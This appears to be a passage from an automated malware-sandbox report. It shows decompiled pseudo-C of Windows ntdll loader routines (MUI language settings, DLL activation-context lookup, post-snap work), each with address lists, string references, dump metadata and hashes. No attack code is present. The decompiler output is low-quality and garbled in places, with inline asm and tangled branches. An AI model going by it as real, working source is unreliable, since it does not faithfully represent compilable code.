						if(E017B1B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L017C4620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E017EF3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E017F1370(_t276, 0x1784e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E017EBB40(0,  &_v68, _t170);
									if(L017B43C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E017EBB40(_t257,  &_v68, _t243);
								if(L017B43C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E017F1370(_t278, 0x1784e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L017C4620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E017EF3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E017F1370(_v16, 0x1784e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E017EBB40(_t262,  &_v68, _t244);
								if(L017B43C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E017F1370(_t282, 0x1784e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E017EBB40(_t262,  &_v68, _t201);
							if(L017B43C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L017C4620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E017EF3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E017F1370(_t280, 0x1784e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E017EBB40(_t267,  &_v68, _t245);
							if(L017B43C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E017F1370(_t284, 0x1784e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E017EBB40(_t267,  &_v68, _t224);
						if(L017B43C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}










































                                                      0x017b3d3c
                                                      0x017b3d42
                                                      0x017b3d44
                                                      0x017b3d46
                                                      0x017b3d49
                                                      0x017b3d4c
                                                      0x017b3d4f
                                                      0x017b3d52
                                                      0x017b3d55
                                                      0x017b3d58
                                                      0x017b3d5b
                                                      0x017b3d5f
                                                      0x017b3d61
                                                      0x017b3d66
                                                      0x01808213
                                                      0x01808218
                                                      0x017b4085
                                                      0x017b4088
                                                      0x017b408e
                                                      0x017b4094
                                                      0x017b409a
                                                      0x017b40a0
                                                      0x017b40a6
                                                      0x017b40a9
                                                      0x017b40af
                                                      0x017b40b6
                                                      0x017b40bd
                                                      0x017b40bd
                                                      0x017b3d83
                                                      0x0180821f
                                                      0x01808229
                                                      0x01808238
                                                      0x01808238
                                                      0x0180823d
                                                      0x0180823d
                                                      0x017b3da0
                                                      0x017b3daf
                                                      0x017b3db5
                                                      0x017b3dba
                                                      0x017b3dba
                                                      0x017b3dd4
                                                      0x017b3e94
                                                      0x017b3eab
                                                      0x017b3f6d
                                                      0x017b3f84
                                                      0x017b406b
                                                      0x017b406b
                                                      0x017b406e
                                                      0x017b406e
                                                      0x017b4070
                                                      0x017b4074
                                                      0x01808351
                                                      0x01808351
                                                      0x017b407a
                                                      0x017b407f
                                                      0x0180835d
                                                      0x01808370
                                                      0x01808377
                                                      0x01808379
                                                      0x0180837c
                                                      0x0180837c
                                                      0x0180835d
                                                      0x00000000
                                                      0x017b407f
                                                      0x017b3f8a
                                                      0x017b3f8d
                                                      0x017b3f90
                                                      0x017b3f95
                                                      0x0180830d
                                                      0x0180830f
                                                      0x017b3f9b
                                                      0x017b3fac
                                                      0x017b3fae
                                                      0x017b3fb1
                                                      0x017b3fb1
                                                      0x017b3fb6
                                                      0x01808317
                                                      0x0180831a
                                                      0x00000000
                                                      0x017b3fbc
                                                      0x017b3fc1
                                                      0x017b3fc9
                                                      0x017b3fd7
                                                      0x017b3fda
                                                      0x017b3fdd
                                                      0x017b4021
                                                      0x017b4021
                                                      0x017b4029
                                                      0x017b4030
                                                      0x017b4044
                                                      0x017b4046
                                                      0x017b4046
                                                      0x017b4044
                                                      0x017b4049
                                                      0x01808327
                                                      0x01808334
                                                      0x01808339
                                                      0x0180833c
                                                      0x017b404f
                                                      0x017b404f
                                                      0x017b404f
                                                      0x017b4051
                                                      0x017b4056
                                                      0x017b4063
                                                      0x017b4063
                                                      0x017b4068
                                                      0x00000000
                                                      0x017b4068
                                                      0x017b3fdf
                                                      0x017b3fe2
                                                      0x017b3fe4
                                                      0x017b3fe7
                                                      0x017b3fef
                                                      0x017b4003
                                                      0x017b4005
                                                      0x017b4005
                                                      0x017b400c
                                                      0x017b4013
                                                      0x017b4016
                                                      0x017b4017
                                                      0x017b401b
                                                      0x017b401e
                                                      0x00000000
                                                      0x017b401e
                                                      0x017b3fb6
                                                      0x017b3eb1
                                                      0x017b3eb4
                                                      0x017b3eb7
                                                      0x017b3ebc
                                                      0x018082a9
                                                      0x018082ab
                                                      0x017b3ec2
                                                      0x017b3ed3
                                                      0x017b3ed5
                                                      0x017b3ed8
                                                      0x017b3ed8
                                                      0x017b3edd
                                                      0x018082b3
                                                      0x018082b6
                                                      0x00000000
                                                      0x017b3ee3
                                                      0x017b3ee8
                                                      0x017b3eed
                                                      0x017b3ef0
                                                      0x017b3ef3
                                                      0x017b3f02
                                                      0x017b3f05
                                                      0x017b3f08
                                                      0x018082c0
                                                      0x018082c3
                                                      0x018082c5
                                                      0x018082c8
                                                      0x018082d0
                                                      0x018082e4
                                                      0x018082e6
                                                      0x018082e6
                                                      0x018082ed
                                                      0x018082f4
                                                      0x018082f7
                                                      0x018082f8
                                                      0x018082fc
                                                      0x018082ff
                                                      0x018082ff
                                                      0x017b3f0e
                                                      0x017b3f11
                                                      0x017b3f16
                                                      0x017b3f1d
                                                      0x017b3f31
                                                      0x01808307
                                                      0x01808307
                                                      0x017b3f31
                                                      0x017b3f39
                                                      0x017b3f48
                                                      0x017b3f4d
                                                      0x017b3f50
                                                      0x017b3f50
                                                      0x017b3f53
                                                      0x017b3f58
                                                      0x017b3f65
                                                      0x017b3f65
                                                      0x017b3f6a
                                                      0x00000000
                                                      0x017b3f6a
                                                      0x017b3edd
                                                      0x017b3dda
                                                      0x017b3ddd
                                                      0x017b3de0
                                                      0x017b3de5
                                                      0x01808245
                                                      0x017b3deb
                                                      0x017b3df7
                                                      0x017b3dfc
                                                      0x017b3dfe
                                                      0x017b3e01
                                                      0x017b3e01
                                                      0x017b3e06
                                                      0x0180824d
                                                      0x0180824f
                                                      0x01808254
                                                      0x00000000
                                                      0x017b3e0c
                                                      0x017b3e11
                                                      0x017b3e16
                                                      0x017b3e19
                                                      0x017b3e29
                                                      0x017b3e2c
                                                      0x017b3e2f
                                                      0x0180825c
                                                      0x0180825f
                                                      0x01808261
                                                      0x01808264
                                                      0x0180826c
                                                      0x01808280
                                                      0x01808282
                                                      0x01808282
                                                      0x01808289
                                                      0x01808290
                                                      0x01808293
                                                      0x01808294
                                                      0x01808298
                                                      0x0180829b
                                                      0x0180829b
                                                      0x017b3e35
                                                      0x017b3e38
                                                      0x017b3e3d
                                                      0x017b3e44
                                                      0x017b3e58
                                                      0x018082a3
                                                      0x018082a3
                                                      0x017b3e58
                                                      0x017b3e60
                                                      0x017b3e6f
                                                      0x017b3e74
                                                      0x017b3e77
                                                      0x017b3e77
                                                      0x017b3e7a
                                                      0x017b3e7f
                                                      0x017b3e8c
                                                      0x017b3e8c
                                                      0x017b3e91
                                                      0x00000000
                                                      0x017b3e91

                                                      Strings
                                                      • Kernel-MUI-Language-SKU, xrefs: 017B3F70
                                                      • WindowsExcludedProcs, xrefs: 017B3D6F
                                                      • Kernel-MUI-Language-Allowed, xrefs: 017B3DC0
                                                      • Kernel-MUI-Language-Disallowed, xrefs: 017B3E97
                                                      • Kernel-MUI-Number-Allowed, xrefs: 017B3D8C
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.394726927.0000000001780000.00000040.00000001.sdmp, Offset: 01780000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                      • API String ID: 0-258546922
                                                      • Opcode ID: d2229998ed12e387aa03605d179ac6ec319a3bd48697ec5cd0c67e83d60e1a55
                                                      • Instruction ID: 3b92f503e57748ffa12f842f2f7dcd8e3ab7dcacc42253aa20eb634e721e3525
                                                      • Opcode Fuzzy Hash: d2229998ed12e387aa03605d179ac6ec319a3bd48697ec5cd0c67e83d60e1a55
                                                      • Instruction Fuzzy Hash: 86F12772D00219EBCB12DF98C984AEEFBB9FF59750F15006AE506E7251E7749A40CBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 017D8E00, Relevance: 5.1, Strings: 4, Instructions: 126COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 44%
                                                      			E017D8E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x189d360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x1898464; // 0x74790110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x1895780 & 0x00000003) != 0) {
							E01825510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x1895780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E017EB640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x1897984; // 0x14e2bb8
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x1898464; // 0x74790110
					 *0x189b1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E017D9B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x1895780 & 0x00000005) != 0) {
						_push(_t49);
						E01825510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}




















                                                      0x017d8e0f
                                                      0x017d8e16
                                                      0x017d8e19
                                                      0x017d8e1b
                                                      0x017d8e21
                                                      0x017d8e7f
                                                      0x017d8e85
                                                      0x01819354
                                                      0x0181936c
                                                      0x01819371
                                                      0x0181937b
                                                      0x01819381
                                                      0x01819381
                                                      0x0181937b
                                                      0x017d8e9d
                                                      0x017d8e9d
                                                      0x017d8e29
                                                      0x017d8e2c
                                                      0x017d8e38
                                                      0x017d8e3e
                                                      0x017d8e43
                                                      0x017d8eb5
                                                      0x017d8eb9
                                                      0x018192aa
                                                      0x018192af
                                                      0x018192e8
                                                      0x018192e8
                                                      0x018192af
                                                      0x017d8eb9
                                                      0x017d8e45
                                                      0x017d8e53
                                                      0x017d8e5b
                                                      0x017d8e5f
                                                      0x017d8e78
                                                      0x017d8e78
                                                      0x017d8e7d
                                                      0x017d8ec3
                                                      0x017d8ecd
                                                      0x017d8ed2
                                                      0x017d8ed2
                                                      0x017d8ec5
                                                      0x017d8ec5
                                                      0x00000000
                                                      0x017d8e7d
                                                      0x017d8e67
                                                      0x017d8ea4
                                                      0x0181931a
                                                      0x00000000
                                                      0x00000000
                                                      0x01819320
                                                      0x017d8ea4
                                                      0x017d8e70
                                                      0x01819325
                                                      0x01819340
                                                      0x01819345
                                                      0x01819345
                                                      0x017d8e76
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000

                                                      Strings
                                                      • Querying the active activation context failed with status 0x%08lx, xrefs: 01819357
                                                      • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0181932A
                                                      • LdrpFindDllActivationContext, xrefs: 01819331, 0181935D
                                                      • minkernel\ntdll\ldrsnap.c, xrefs: 0181933B, 01819367
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.394726927.0000000001780000.00000040.00000001.sdmp, Offset: 01780000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                      • API String ID: 0-3779518884
                                                      • Opcode ID: b4a3f68506b216ce7627fe94036e54d2160b8960c5379eb7b94d649ad0e13656
                                                      • Instruction ID: d7a02f92a7c4ed64a13030f36747a8d40bb3e1b05906b47a598ed36abd608f1a
                                                      • Opcode Fuzzy Hash: b4a3f68506b216ce7627fe94036e54d2160b8960c5379eb7b94d649ad0e13656
                                                      • Instruction Fuzzy Hash: 47412C72A4031DAFDB366A1CCC99A79F7B4BB09718F094569E50497151E7709E808FC3
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 017B8794, Relevance: 4.0, Strings: 3, Instructions: 255COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 83%
                                                      			E017B8794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E017B934A() != 0) {
								_t159 = E0182A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0x1895780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E01825510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0x1895780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E017B849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E017B8999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E017B8999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0x1895c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0x1895c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E017C2280(_t92, 0x18986cc);
															_t94 = E01879DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E017D61A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0x1895c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E017B8A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0x1895c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0x1895c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E017EF380(_t136, 0x1781184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E017C2280(_t108, 0x18986cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E017D61A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E01879D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E017BFFB0(_t118, _t156, 0x18986cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E017E9A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}












































                                                      0x017b8799
                                                      0x017b879d
                                                      0x017b87a1
                                                      0x017b87a3
                                                      0x017b87a8
                                                      0x017b87c3
                                                      0x017b87c3
                                                      0x017b87c8
                                                      0x017b87d1
                                                      0x017b87d4
                                                      0x017b87d8
                                                      0x017b87e5
                                                      0x017b87ec
                                                      0x01809bfe
                                                      0x01809c00
                                                      0x01809c02
                                                      0x01809c08
                                                      0x01809c0d
                                                      0x01809c0f
                                                      0x01809c14
                                                      0x01809c2d
                                                      0x01809c32
                                                      0x01809c37
                                                      0x01809c3a
                                                      0x01809c3c
                                                      0x01809c42
                                                      0x01809c42
                                                      0x01809c3c
                                                      0x01809c02
                                                      0x017b87da
                                                      0x017b87df
                                                      0x017b87e3
                                                      0x00000000
                                                      0x00000000
                                                      0x017b87e3
                                                      0x017b87f2
                                                      0x00000000
                                                      0x017b87fb
                                                      0x017b87fd
                                                      0x017b87fe
                                                      0x017b880e
                                                      0x017b880f
                                                      0x017b8810
                                                      0x017b8814
                                                      0x017b881a
                                                      0x017b881c
                                                      0x017b881f
                                                      0x017b8821
                                                      0x017b8822
                                                      0x017b8824
                                                      0x017b8826
                                                      0x017b882c
                                                      0x017b882e
                                                      0x01809c48
                                                      0x01809c48
                                                      0x017b8834
                                                      0x017b8834
                                                      0x017b8837
                                                      0x00000000
                                                      0x00000000
                                                      0x017b8837
                                                      0x017b882e
                                                      0x017b883d
                                                      0x017b8840
                                                      0x017b8843
                                                      0x017b8846
                                                      0x017b8849
                                                      0x017b884c
                                                      0x017b884e
                                                      0x017b8850
                                                      0x017b8852
                                                      0x017b8854
                                                      0x017b8857
                                                      0x017b88b4
                                                      0x017b88b6
                                                      0x017b88b6
                                                      0x017b8859
                                                      0x017b8859
                                                      0x017b8859
                                                      0x017b8861
                                                      0x017b8866
                                                      0x017b886a
                                                      0x017b893d
                                                      0x017b8941
                                                      0x00000000
                                                      0x017b8947
                                                      0x017b8947
                                                      0x017b894a
                                                      0x017b894c
                                                      0x00000000
                                                      0x017b8952
                                                      0x017b8955
                                                      0x017b895a
                                                      0x017b895d
                                                      0x017b895d
                                                      0x017b895f
                                                      0x017b8961
                                                      0x017b8961
                                                      0x017b8968
                                                      0x00000000
                                                      0x00000000
                                                      0x017b896a
                                                      0x017b896b
                                                      0x017b896e
                                                      0x00000000
                                                      0x017b8970
                                                      0x017b8970
                                                      0x017b8970
                                                      0x017b8970
                                                      0x017b8972
                                                      0x017b8972
                                                      0x017b8974
                                                      0x00000000
                                                      0x017b897a
                                                      0x017b897a
                                                      0x017b897d
                                                      0x00000000
                                                      0x017b8983
                                                      0x01809c65
                                                      0x01809c6d
                                                      0x01809c72
                                                      0x01809c75
                                                      0x01809c75
                                                      0x01809c82
                                                      0x01809c86
                                                      0x01809c87
                                                      0x01809c88
                                                      0x01809c89
                                                      0x01809c8c
                                                      0x01809c90
                                                      0x01809c95
                                                      0x01809c97
                                                      0x01809ca0
                                                      0x01809ca3
                                                      0x01809ca9
                                                      0x01809ca9
                                                      0x00000000
                                                      0x01809ca9
                                                      0x01809ca3
                                                      0x00000000
                                                      0x01809c97
                                                      0x017b897d
                                                      0x00000000
                                                      0x017b8974
                                                      0x017b8988
                                                      0x017b8992
                                                      0x017b8996
                                                      0x00000000
                                                      0x017b8996
                                                      0x017b894c
                                                      0x00000000
                                                      0x017b8870
                                                      0x017b887b
                                                      0x017b887d
                                                      0x017b887f
                                                      0x017b8881
                                                      0x017b8884
                                                      0x017b8884
                                                      0x017b8886
                                                      0x017b8889
                                                      0x017b888c
                                                      0x017b888e
                                                      0x017b8891
                                                      0x017b8891
                                                      0x017b8898
                                                      0x00000000
                                                      0x00000000
                                                      0x017b889a
                                                      0x017b889b
                                                      0x017b889e
                                                      0x00000000
                                                      0x00000000
                                                      0x017b88a0
                                                      0x017b88a8
                                                      0x017b88b0
                                                      0x017b88b2
                                                      0x017b88d3
                                                      0x017b88d5
                                                      0x00000000
                                                      0x017b88d7
                                                      0x017b88db
                                                      0x017b88dc
                                                      0x017b88e0
                                                      0x017b88e8
                                                      0x017b88ee
                                                      0x017b88f0
                                                      0x017b88f3
                                                      0x017b88fc
                                                      0x017b8901
                                                      0x017b8906
                                                      0x017b890c
                                                      0x017b890c
                                                      0x017b890f
                                                      0x017b8916
                                                      0x017b8917
                                                      0x017b8918
                                                      0x017b8919
                                                      0x017b891a
                                                      0x017b891f
                                                      0x017b8921
                                                      0x01809c52
                                                      0x01809c55
